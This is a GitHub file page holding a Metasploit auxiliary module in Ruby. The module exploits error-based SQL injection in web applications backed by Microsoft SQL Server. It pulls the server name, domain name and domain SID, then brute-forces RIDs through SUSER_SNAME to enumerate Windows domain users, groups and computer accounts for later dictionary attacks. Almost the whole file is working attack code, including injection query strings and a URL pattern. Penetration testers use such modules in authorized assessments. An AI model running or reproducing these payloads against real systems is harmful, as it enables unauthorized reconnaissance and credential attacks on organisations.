-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathmssql_enum_windows_domain_accounts_sqli.rb
More file actions
executable file
·222 lines (179 loc) · 7.09 KB
/
mssql_enum_windows_domain_accounts_sqli.rb
File metadata and controls
executable file
·222 lines (179 loc) · 7.09 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration',
'Description' => %q{
This module can be used to bruteforce RIDs associated with the domain of the SQL Server
using the SUSER_SNAME function via Error Based SQL injection. This is similar to the
smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC
role (everyone). Information that can be enumerated includes Windows domain users, groups,
and computer accounts. Enumerated accounts can then be used in online dictionary attacks.
The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
},
'Author' =>
[
'nullbind <scott.sutherland[at]netspi.com>',
'antti <antti.rantasaari[at]netspi.com>'
],
'License' => MSF_LICENSE,
'References' => [[ 'URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]
))
register_options(
[
OptInt.new('STARTRID', [true, 'RID to start fuzzing at.', 500]),
OptInt.new('ENDRID', [true, 'RID to stop fuzzing at.', 3000])
], self.class)
end
def run
print_status("#{peer} - Grabbing the SQL Server name and domain...")
db_server_name = get_server_name
if db_server_name.nil?
print_error("#{peer} - Unable to grab the server name")
return
else
print_good("#{peer} - Server name: #{db_server_name}")
end
db_domain_name = get_domain_name
if db_domain_name.nil?
print_error("#{peer} - Unable to grab domain name")
return
end
# Check if server is on a domain
if db_server_name == db_domain_name
print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain")
return
else
print_good("#{peer} - Domain name: #{db_domain_name}")
end
print_status("#{peer} - Grabbing the SID for the domain...")
windows_domain_sid = get_windows_domain_sid(db_domain_name)
if windows_domain_sid.nil?
print_error("#{peer} - Could not recover the SQL Server's domain sid.")
return
else
print_good("#{peer} - Domain sid: #{windows_domain_sid}")
end
# Get a list of windows users, groups, and computer accounts using SUSER_NAME()
total_rids = datastore['ENDRID'] - datastore['STARTRID']
print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...")
domain_users = get_win_domain_users(windows_domain_sid)
if domain_users.nil?
print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.")
return
end
# Print number of objects found and write to a file
print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.")
# Create table for report
windows_domain_login_table = Rex::Ui::Text::Table.new(
'Header' => 'Windows Domain Accounts',
'Ident' => 1,
'Columns' => ['name']
)
# Add brute forced names to table
domain_users.each do |object_name|
windows_domain_login_table << [object_name]
end
print_line(windows_domain_login_table.to_s)
# Create output file
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv"
path = store_loot(
'mssql.domain.accounts',
'text/plain',
datastore['RHOST'],
windows_domain_login_table.to_csv,
filename,
'SQL Server query results'
)
print_status("Query results have been saved to: #{path}")
end
# Get the server name
def get_server_name
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
instance_name = $1
sql_server_name = instance_name.split('\\')[0]
else
sql_server_name = nil
end
sql_server_name
end
# Get the domain name of the SQL Server
def get_domain_name
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
domain_name = $1
else
domain_name = nil
end
domain_name
end
# Get the SID for the domain
def get_windows_domain_sid(db_domain_name)
domain_group = "#{db_domain_name}\\Domain Admins"
clue_start = Rex::Text.rand_text_alpha(8)
clue_end = Rex::Text.rand_text_alpha(8)
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
object_sid = $1
domain_sid = object_sid[0..47]
return nil if domain_sid.empty?
else
domain_sid = nil
end
domain_sid
end
# Get list of windows accounts, groups and computer accounts
def get_win_domain_users(domain_sid)
clue_start = Rex::Text.rand_text_alpha(8)
clue_end = Rex::Text.rand_text_alpha(8)
windows_logins = []
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
(datastore['STARTRID']..datastore['ENDRID']).each do |principal_id|
total_rids = datastore['ENDRID'] - datastore['STARTRID']
rid_diff = (datastore['ENDRID'] - (datastore['ENDRID'] - principal_id)) - datastore['STARTRID']
if principal_id % 100 == 0
print_status("#{peer} - #{rid_diff} of #{total_rids } RIDs complete")
end
user_sid = build_user_sid(domain_sid, principal_id)
# Return if sid does not resolve correctly for a domain
if user_sid.length < 48
return nil
end
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{user_sid}) as name)+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
windows_login = $1
unless windows_login.empty? || windows_logins.include?(windows_login)
windows_logins.push(windows_login)
print_good("#{peer} - #{windows_login}")
end
end
end
windows_logins
end
def build_user_sid(domain_sid, rid)
# Convert number to hex and fix order
principal_id = "%02X" % rid
principal_id = principal_id.size.even? ? principal_id : "0#{principal_id}"
principal_id = principal_id.scan(/(..)/).reverse.join
# Add padding
principal_id = principal_id.ljust(8, '0')
# Create full sid
"0x#{domain_sid}#{principal_id}"
end
end